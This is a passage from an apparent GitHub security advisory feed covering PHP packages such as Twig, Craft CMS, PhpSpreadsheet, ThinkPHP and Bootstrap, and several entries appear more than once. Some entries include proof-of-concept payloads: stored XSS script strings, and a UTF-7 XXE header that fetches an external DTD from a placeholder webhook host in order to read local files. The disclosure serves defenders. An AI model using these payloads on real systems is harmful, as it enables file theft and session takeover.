<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45048">https://nvd.nist.gov/vuln/detail/CVE-2024-45048</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda">https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-ghg6-32f9-2jp7</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</guid>
<author>GitHub</author>
</item>
<item>
<title>[twig/twig] Twig has a possible sandbox bypass</title>
<description><h3 id="description">Description</h3>
<p>Under some circumstances, the sandbox security checks are not run which allows user-contributed templates to bypass the sandbox restrictions.</p>
<p>The security issue happens when all these conditions are met:</p>
<ul>
<li>The sandbox is disabled globally;</li>
<li>The sandbox is enabled via a sandboxed <code>include()</code> function which references a template name (like <code>included.twig</code>) and not a <code>Template</code> or <code>TemplateWrapper</code> instance;</li>
<li>The included template has been loaded before the <code>include()</code> call but in a non-sandbox context (possible as the sandbox has been globally disabled).</li>
</ul>
<h3 id="resolution">Resolution</h3>
<p>The patch ensures that the sandbox security checks are always run at runtime.</p>
<h3 id="credits">Credits</h3>
<p>We would like to thank Fabien Potencier for reporting and fixing the issue.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66">https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6">https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de">https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233">https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45411">https://nvd.nist.gov/vuln/detail/CVE-2024-45411</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635">https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635</a></li>
<li><a href="https://github.com/advisories/GHSA-6j75-5wfj-gh66">https://github.com/advisories/GHSA-6j75-5wfj-gh66</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-6j75-5wfj-gh66</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-6j75-5wfj-gh66</guid>
<author>GitHub</author>
</item>
<item>
<title>[twig/twig] Twig has a possible sandbox bypass</title>
<description><h3 id="description">Description</h3>
<p>Under some circumstances, the sandbox security checks are not run which allows user-contributed templates to bypass the sandbox restrictions.</p>
<p>The security issue happens when all these conditions are met:</p>
<ul>
<li>The sandbox is disabled globally;</li>
<li>The sandbox is enabled via a sandboxed <code>include()</code> function which references a template name (like <code>included.twig</code>) and not a <code>Template</code> or <code>TemplateWrapper</code> instance;</li>
<li>The included template has been loaded before the <code>include()</code> call but in a non-sandbox context (possible as the sandbox has been globally disabled).</li>
</ul>
<h3 id="resolution">Resolution</h3>
<p>The patch ensures that the sandbox security checks are always run at runtime.</p>
<h3 id="credits">Credits</h3>
<p>We would like to thank Fabien Potencier for reporting and fixing the issue.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66">https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6">https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de">https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233">https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45411">https://nvd.nist.gov/vuln/detail/CVE-2024-45411</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635">https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635</a></li>
<li><a href="https://github.com/advisories/GHSA-6j75-5wfj-gh66">https://github.com/advisories/GHSA-6j75-5wfj-gh66</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-6j75-5wfj-gh66</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-6j75-5wfj-gh66</guid>
<author>GitHub</author>
</item>
<item>
<title>[damienharper/auditor-bundle] auditor-bundle vulnerable to Cross-site Scripting because name of entity does not get escaped</title>
<description><h3 id="summary">Summary</h3>
<p>Unescaped entity property enables Javascript injection.</p>
<h3 id="details">Details</h3>
<p>I think this is possible because %source_label% in twig macro is not escaped. Therefore script tags can be inserted and are executed.</p>
<h3 id="poc">PoC</h3>
<ul>
<li>clone example project <a href="https://github.com/DamienHarper/auditor-bundle-demo">https://github.com/DamienHarper/auditor-bundle-demo</a></li>
<li>create author with FullName </li>
<li>delete author</li>
<li>view audit of authors</li>
<li>alert is displayed</li>
</ul>
<h3 id="impact">Impact</h3>
<p>persistent XSS. JS can be injected and executed.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/DamienHarper/auditor-bundle/security/advisories/GHSA-78vg-7v27-hj67">https://github.com/DamienHarper/auditor-bundle/security/advisories/GHSA-78vg-7v27-hj67</a></li>
<li><a href="https://github.com/DamienHarper/auditor-bundle/commit/42ba2940d8b99467de0c806ea5655cc1c6882cd1">https://github.com/DamienHarper/auditor-bundle/commit/42ba2940d8b99467de0c806ea5655cc1c6882cd1</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45592">https://nvd.nist.gov/vuln/detail/CVE-2024-45592</a></li>
<li><a href="https://github.com/advisories/GHSA-78vg-7v27-hj67">https://github.com/advisories/GHSA-78vg-7v27-hj67</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-78vg-7v27-hj67</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-78vg-7v27-hj67</guid>
<author>GitHub</author>
</item>
<item>
<title>[topthink/framework] ThinkPHP deserialization vulnerability</title>
<description><p>A deserialization vulnerability in Thinkphp v6.1.3 to v8.0.4 allows attackers to execute arbitrary code.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-44902">https://nvd.nist.gov/vuln/detail/CVE-2024-44902</a></li>
<li><a href="https://github.com/fru1ts/CVE-2024-44902">https://github.com/fru1ts/CVE-2024-44902</a></li>
<li><a href="http://thinkphp.com/">http://thinkphp.com</a></li>
<li><a href="https://github.com/advisories/GHSA-f4wh-359g-4pq7">https://github.com/advisories/GHSA-f4wh-359g-4pq7</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-f4wh-359g-4pq7</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-f4wh-359g-4pq7</guid>
<author>GitHub</author>
</item>
<item>
<title>[twig/twig] Twig has a possible sandbox bypass</title>
<description><h3 id="description">Description</h3>
<p>Under some circumstances, the sandbox security checks are not run which allows user-contributed templates to bypass the sandbox restrictions.</p>
<p>The security issue happens when all these conditions are met:</p>
<ul>
<li>The sandbox is disabled globally;</li>
<li>The sandbox is enabled via a sandboxed <code>include()</code> function which references a template name (like <code>included.twig</code>) and not a <code>Template</code> or <code>TemplateWrapper</code> instance;</li>
<li>The included template has been loaded before the <code>include()</code> call but in a non-sandbox context (possible as the sandbox has been globally disabled).</li>
</ul>
<h3 id="resolution">Resolution</h3>
<p>The patch ensures that the sandbox security checks are always run at runtime.</p>
<h3 id="credits">Credits</h3>
<p>We would like to thank Fabien Potencier for reporting and fixing the issue.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66">https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6">https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de">https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233">https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45411">https://nvd.nist.gov/vuln/detail/CVE-2024-45411</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635">https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635</a></li>
<li><a href="https://github.com/advisories/GHSA-6j75-5wfj-gh66">https://github.com/advisories/GHSA-6j75-5wfj-gh66</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-6j75-5wfj-gh66</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-6j75-5wfj-gh66</guid>
<author>GitHub</author>
</item>
<item>
<title>[twig/twig] Twig has a possible sandbox bypass</title>
<description><h3 id="description">Description</h3>
<p>Under some circumstances, the sandbox security checks are not run which allows user-contributed templates to bypass the sandbox restrictions.</p>
<p>The security issue happens when all these conditions are met:</p>
<ul>
<li>The sandbox is disabled globally;</li>
<li>The sandbox is enabled via a sandboxed <code>include()</code> function which references a template name (like <code>included.twig</code>) and not a <code>Template</code> or <code>TemplateWrapper</code> instance;</li>
<li>The included template has been loaded before the <code>include()</code> call but in a non-sandbox context (possible as the sandbox has been globally disabled).</li>
</ul>
<h3 id="resolution">Resolution</h3>
<p>The patch ensures that the sandbox security checks are always run at runtime.</p>
<h3 id="credits">Credits</h3>
<p>We would like to thank Fabien Potencier for reporting and fixing the issue.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66">https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6">https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de">https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233">https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45411">https://nvd.nist.gov/vuln/detail/CVE-2024-45411</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635">https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635</a></li>
<li><a href="https://github.com/advisories/GHSA-6j75-5wfj-gh66">https://github.com/advisories/GHSA-6j75-5wfj-gh66</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-6j75-5wfj-gh66</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-6j75-5wfj-gh66</guid>
<author>GitHub</author>
</item>
<item>
<title>[craftcms/cms] Craft CMS vulnerable to stored XSS in breadcrumb list and title fields</title>
<description><h3 id="summary">Summary</h3>
<p>Multiple Stored XSS can be triggered by the breadcrumb list and title fields with user input.</p>
<h3 id="details">Details</h3>
<ol>
<li>In the <strong>/admin/categories</strong> page, category title isn't sanitized and triggered xss.</li>
<li>In the category edit page under the <strong>/admin/categories/</strong>, category title in breadcrumb list isn't sanitized and triggered xss.</li>
<li>In the <strong>/admin/entries</strong> page, entry title isn't sanitized and triggered xss.</li>
<li>In the entry edit page under the <strong>/admin/entries/</strong>, entry title in breadcrumb list isn't sanitized and triggered xss.</li>
<li>In the <strong>/admin/myaccount</strong> and pages under it, username or full name in breadcrumb list isn't sanitized and triggered xss.</li>
</ol>
<h3 id="impact">Impact</h3>
<p>Malicious users can tamper with the control panel.</p>
<h3 id="poc">PoC</h3>
<h4 id="1-in-the-admincategories-page-category-title-isnt-sanitized-and-triggered-xss">1. In the <strong>/admin/categories</strong> page, category title isn't sanitized and triggered xss.</h4>
<pre><code>1. Access to the Settings -&gt; Categories ( /admin/settings/categories )
2. Create new category group
3. Access to the Categories page ( /admin/categories/ )
4. Push the New category button
5. Input the Title column : xss&lt;script&gt;alert('xss')&lt;/script&gt;
6. Push the Create Category or Save button
7. Access to the Categories page again and it triggers xss
</code></pre>
<p><img alt="image" src="https://github.com/craftcms/cms/assets/83068208/a1b2890e-731b-4fc4-b189-26591f4486fd" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/4e0f35c7-fbb0-4d38-a0b5-9e28750ff706" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/e046b9db-d83c-4f81-ad91-165c5afedeb9" referrerpolicy="no-referrer"></p>
<h4 id="2-in-the-category-edit-page-under-the-admincategories-category-title-in-breadcrumb-list-isnt-sanitized-and-triggered-xss">2. In the category edit page under the <strong>/admin/categories/</strong>, category title in breadcrumb list isn't sanitized and triggered xss.</h4>
<pre><code>1. Access to the Settings -&gt; Categories ( /admin/settings/categories )
2. Create new category group
3. Access to the Categories page ( /admin/categories/ )
4. Push the New category button
5. Input the Title column : xss&lt;script&gt;alert('xss')&lt;/script&gt;
6. Push the Create Category or Save button
7. Access to the Category edit page again and it triggers xss
</code></pre>
<p><img alt="image" src="https://github.com/craftcms/cms/assets/83068208/a1b2890e-731b-4fc4-b189-26591f4486fd" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/f7543a11-58eb-4099-9ee2-3461816c52ea" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/f01bbb80-4417-42ca-bf51-b38860f6c74a" referrerpolicy="no-referrer"></p>
<h4 id="3-in-the-adminentries-page-entry-title-isnt-sanitized-and-triggered-xss">3. In the <strong>/admin/entries</strong> page, entry title isn't sanitized and triggered xss.</h4>
<pre><code>1. Access to the Settings -&gt; Entry Types ( /admin/settings/entry-types )
2. Create new entry type
3. Access to the Settings -&gt; Sections ( /admin/settings/sections )
4. Create new section
5. Access to the Entries page ( /admin/entries )
6. Push the New entry button
7. Input the Title column : xss&lt;script&gt;alert('xss')&lt;/script&gt;
8. Push the Create entry or Save button
9. Access to the Entries page again and it triggers xss
</code></pre>
<p><img alt="image" src="https://github.com/craftcms/cms/assets/83068208/ba700899-947f-4421-a1b7-3f0cc2c0da30" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/b255a999-e48c-46be-b732-4482ea9cee9a" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/445d8e0c-71b6-49c7-8f4a-37541dcc9c85" referrerpolicy="no-referrer"></p>
<h4 id="4-in-the-entry-edit-page-under-the-adminentries-entry-title-in-breadcrumb-list-isnt-sanitized-and-triggered-xss">4. In the entry edit page under the <strong>/admin/entries/</strong>, entry title in breadcrumb list isn't sanitized and triggered xss.</h4>
<pre><code>1. Access to the Settings -&gt; Entry Types ( /admin/settings/entry-types )
2. Create new entry type
3. Access to the Settings -&gt; Sections ( /admin/settings/sections )
4. Create new section
5. Access to the Entries page ( /admin/entries )
6. Push the New entry button
7. Input the Title column : xss&lt;script&gt;alert('xss')&lt;/script&gt;
8. Push the Create entry or Save button
9. Access to the Entriy edit page again and it triggers xss
</code></pre>
<p><img alt="image" src="https://github.com/craftcms/cms/assets/83068208/ba700899-947f-4421-a1b7-3f0cc2c0da30" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/a59a122b-b9e7-4695-be13-eb8a1c2d36df" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/b0d27446-7ac6-47e7-ac02-20c924698b13" referrerpolicy="no-referrer"></p>
<h4 id="5-in-the-adminmyaccount-and-pages-under-it-username-or-full-name-in-breadcrumb-list-isnt-sanitized-and-triggered-xss">5. In the <strong>/admin/myaccount</strong> and pages under it, username or full name in breadcrumb list isn't sanitized and triggered xss.</h4>
<pre><code>1. Access to the My Account Page ( /admin/myaccount )
2. Input the Full Name column : xss&lt;script&gt;alert('xss')&lt;/script&gt;
3. Push the the Save button
4. Access to the My Account page ( /admin/myaccount ) or pages under it ( /admin/myaccount/addresses , /admin/myaccount/preferences , etc.) and it triggers xss
</code></pre>
<p><img alt="image" src="https://github.com/craftcms/cms/assets/83068208/3be45bdd-0757-42a8-bc5d-320ab2339fd0" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/e1be7446-1c54-42bc-af9a-a8ac81a2d7bf" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/5fa06b26-fecd-40f5-bc8b-171f881f8a2a" referrerpolicy="no-referrer"></p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/craftcms/cms/security/advisories/GHSA-28h4-788g-rh42">https://github.com/craftcms/cms/security/advisories/GHSA-28h4-788g-rh42</a></li>
<li><a href="https://github.com/craftcms/cms/commit/b7348942f8131b3868ec6f46d615baae50151bb8">https://github.com/craftcms/cms/commit/b7348942f8131b3868ec6f46d615baae50151bb8</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45406">https://nvd.nist.gov/vuln/detail/CVE-2024-45406</a></li>
<li><a href="https://github.com/advisories/GHSA-28h4-788g-rh42">https://github.com/advisories/GHSA-28h4-788g-rh42</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-28h4-788g-rh42</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-28h4-788g-rh42</guid>
<author>GitHub</author>
</item>
<item>
<title>[nategood/httpful] Httpful is Missing Certificate Validation</title>
<description><p>Httpful has Insecure HTTPS Connections due to Missing Default Certificate Validation</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/nategood/httpful/issues/247">https://github.com/nategood/httpful/issues/247</a></li>
<li><a href="https://github.com/nategood/httpful/commit/44c880e4f559e9215dc6ea9fe50315500c6c2c84">https://github.com/nategood/httpful/commit/44c880e4f559e9215dc6ea9fe50315500c6c2c84</a></li>
<li><a href="https://github.com/FriendsOfPHP/security-advisories/blob/master/nategood/httpful/2024-05-01.yaml">https://github.com/FriendsOfPHP/security-advisories/blob/master/nategood/httpful/2024-05-01.yaml</a></li>
<li><a href="https://github.com/nategood/httpful/blob/fc8e4274a09529a6ff29b9c6c0a105ee43dbfda5/src/Httpful/Request.php#L35">https://github.com/nategood/httpful/blob/fc8e4274a09529a6ff29b9c6c0a105ee43dbfda5/src/Httpful/Request.php#L35</a></li>
<li><a href="https://huntr.com/bounties/8d59c089-92f1-4b73-90f8-54968a70e2fb">https://huntr.com/bounties/8d59c089-92f1-4b73-90f8-54968a70e2fb</a></li>
<li><a href="https://github.com/advisories/GHSA-gcfg-hmwx-wq5h">https://github.com/advisories/GHSA-gcfg-hmwx-wq5h</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-gcfg-hmwx-wq5h</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-gcfg-hmwx-wq5h</guid>
<author>GitHub</author>
</item>
<item>
<title>[twbs/bootstrap] Bootstrap Cross-Site Scripting (XSS) vulnerability</title>
<description><p>A vulnerability has been identified in Bootstrap that exposes users to Cross-Site Scripting (XSS) attacks. The issue is present in the carousel component, where the data-slide and data-slide-to attributes can be exploited through the href attribute of an <a> tag due to inadequate sanitization. This vulnerability could potentially enable attackers to execute arbitrary JavaScript within the victim's browser.</a></p><a>
<h3 id="references">References</h3>
</a><ul><a>
</a><li><a></a><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-6531">https://nvd.nist.gov/vuln/detail/CVE-2024-6531</a></li>
<li><a href="https://www.herodevs.com/vulnerability-directory/cve-2024-6531">https://www.herodevs.com/vulnerability-directory/cve-2024-6531</a></li>
<li><a href="https://github.com/rubysec/ruby-advisory-db/blob/master/gems/bootstrap/CVE-2024-6531.yml">https://github.com/rubysec/ruby-advisory-db/blob/master/gems/bootstrap/CVE-2024-6531.yml</a></li>
<li><a href="https://github.com/advisories/GHSA-vc8w-jr9v-vj7f">https://github.com/advisories/GHSA-vc8w-jr9v-vj7f</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-vc8w-jr9v-vj7f</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-vc8w-jr9v-vj7f</guid>
<author>GitHub</author>
</item>
<item>
<title>[reportico-web/reportico] SQL Injection vulnerability in Reportico Till</title>
<description><p>SQL Injection vulnerability in Reportico Till 8.1.0 allows attackers to obtain sensitive information or other system information via the project parameter.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-47438">https://nvd.nist.gov/vuln/detail/CVE-2023-47438</a></li>
<li><a href="https://github.com/reportico-web/reportico/issues/52">https://github.com/reportico-web/reportico/issues/52</a></li>
<li><a href="https://github.com/advisories/GHSA-jjf4-959w-f545">https://github.com/advisories/GHSA-jjf4-959w-f545</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-jjf4-959w-f545</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-jjf4-959w-f545</guid>
<author>GitHub</author>
</item>
<item>
<title>[phpoffice/phpspreadsheet] PhpSpreadsheet HTML writer is vulnerable to Cross-Site Scripting via style information</title>
<description><h3 id="summary">Summary</h3>
<p><code>\PhpOffice\PhpSpreadsheet\Writer\Html</code> doesn't sanitize spreadsheet styling information such as font names, allowing an attacker to inject arbitrary JavaScript on the page.</p>
<h3 id="poc">PoC</h3>
<p>Example target script:</p>
<pre><code>&lt;?php
require 'vendor/autoload.php';
$reader = \PhpOffice\PhpSpreadsheet\IOFactory::createReader("Xlsx");
$spreadsheet = $reader-&gt;load(__DIR__ . '/book.xlsx');
$writer = new \PhpOffice\PhpSpreadsheet\Writer\Html($spreadsheet);
print($writer-&gt;generateHTMLAll());
</code></pre>
<p>Save this file in the same directory:
<a href="https://github.com/PHPOffice/PhpSpreadsheet/files/15212797/book.xlsx">book.xlsx</a></p>
<p>Open index.php in a web browser. An alert should be displayed.</p>
<h3 id="impact">Impact</h3>
<p>Full takeover of the session of users viewing spreadsheet files as HTML.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-wgmf-q9vr-vww6">https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-wgmf-q9vr-vww6</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45046">https://nvd.nist.gov/vuln/detail/CVE-2024-45046</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/pull/3957">https://github.com/PHPOffice/PhpSpreadsheet/pull/3957</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/commit/f7cf378faed2e11cf4825bf8bafea4922ae44667">https://github.com/PHPOffice/PhpSpreadsheet/commit/f7cf378faed2e11cf4825bf8bafea4922ae44667</a></li>
<li><a href="https://github.com/advisories/GHSA-wgmf-q9vr-vww6">https://github.com/advisories/GHSA-wgmf-q9vr-vww6</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-wgmf-q9vr-vww6</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-wgmf-q9vr-vww6</guid>
<author>GitHub</author>
</item>
<item>
<title>[phpoffice/phpspreadsheet] PhpSpreadsheet HTML writer is vulnerable to Cross-Site Scripting via style information</title>
<description><h3 id="summary">Summary</h3>
<p><code>\PhpOffice\PhpSpreadsheet\Writer\Html</code> doesn't sanitize spreadsheet styling information such as font names, allowing an attacker to inject arbitrary JavaScript on the page.</p>
<h3 id="poc">PoC</h3>
<p>Example target script:</p>
<pre><code>&lt;?php
require 'vendor/autoload.php';
$reader = \PhpOffice\PhpSpreadsheet\IOFactory::createReader("Xlsx");
$spreadsheet = $reader-&gt;load(__DIR__ . '/book.xlsx');
$writer = new \PhpOffice\PhpSpreadsheet\Writer\Html($spreadsheet);
print($writer-&gt;generateHTMLAll());
</code></pre>
<p>Save this file in the same directory:
<a href="https://github.com/PHPOffice/PhpSpreadsheet/files/15212797/book.xlsx">book.xlsx</a></p>
<p>Open index.php in a web browser. An alert should be displayed.</p>
<h3 id="impact">Impact</h3>
<p>Full takeover of the session of users viewing spreadsheet files as HTML.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-wgmf-q9vr-vww6">https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-wgmf-q9vr-vww6</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45046">https://nvd.nist.gov/vuln/detail/CVE-2024-45046</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/pull/3957">https://github.com/PHPOffice/PhpSpreadsheet/pull/3957</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/commit/f7cf378faed2e11cf4825bf8bafea4922ae44667">https://github.com/PHPOffice/PhpSpreadsheet/commit/f7cf378faed2e11cf4825bf8bafea4922ae44667</a></li>
<li><a href="https://github.com/advisories/GHSA-wgmf-q9vr-vww6">https://github.com/advisories/GHSA-wgmf-q9vr-vww6</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-wgmf-q9vr-vww6</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-wgmf-q9vr-vww6</guid>
<author>GitHub</author>
</item>
<item>
<title>[phpoffice/phpspreadsheet] XXE in PHPSpreadsheet encoding is returned</title>
<description><h3 id="summary">Summary</h3>
<p>Bypassing the filter allows a XXE-attack. Which is turn allows attacker to obtain contents of local files, even if error reporting muted by @ symbol. (LFI-attack) </p>
<h3 id="details">Details</h3>
<p>Check <code> $pattern = '/encoding="(.*?)"/';</code> easy to bypass. Just use a single quote symbol <code>'</code>. So payload looks like this:</p>
<pre><code>&lt;?xml version="1.0" encoding='UTF-7' standalone="yes"?&gt;
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/file.dtd"&gt; %xxe;]&gt;
</code></pre>
<p>If you add this header to any XML file into xlsx-formatted file, such as sharedStrings.xml file, then xxe will execute. </p>
<h3 id="poc">PoC</h3>
<ol>
<li>Create simple xlsx file</li>
<li>Rename xlsx to zip</li>
<li>Go to the zip and open the <code>xl/sharedStrings.xml</code> file in edit mode.</li>
<li>Replace <code>&lt;?xml version="1.0" encoding="UTF-8" standalone="yes"?&gt;</code> to</li>
</ol>
<pre><code>&lt;?xml version="1.0" encoding='UTF-7' standalone="yes"?&gt;
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://%webhook%/file.dtd"&gt; %xxe;]&gt;
</code></pre>
<ol start="5">
<li>Save <code>sharedStrings.xml</code> file and rename zip back to xlsx.</li>
<li>Use minimal php code that simply opens this xlsx file:</li>
</ol>
<pre><code>use PhpOffice\PhpSpreadsheet\IOFactory;
require __DIR__ . '/vendor/autoload.php';
$spreadsheet = IOFactory::load("file.xlsx");
</code></pre>
<ol start="7">
<li>You will receive the request to your <code>http://%webhook%/file.dtd</code></li>
<li>Dont't forget that you can use php-wrappers into xxe, some php:// wrapper payload allows fetch local files.</li>
</ol>
<h3 id="impact">Impact</h3>
<p>Read local files
<img alt="lfi" src="https://github.com/PHPOffice/PhpSpreadsheet/assets/95242087/1839cddb-6bb0-486d-8884-9ac485776931" referrerpolicy="no-referrer"></p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45048">https://nvd.nist.gov/vuln/detail/CVE-2024-45048</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda">https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-ghg6-32f9-2jp7</link>
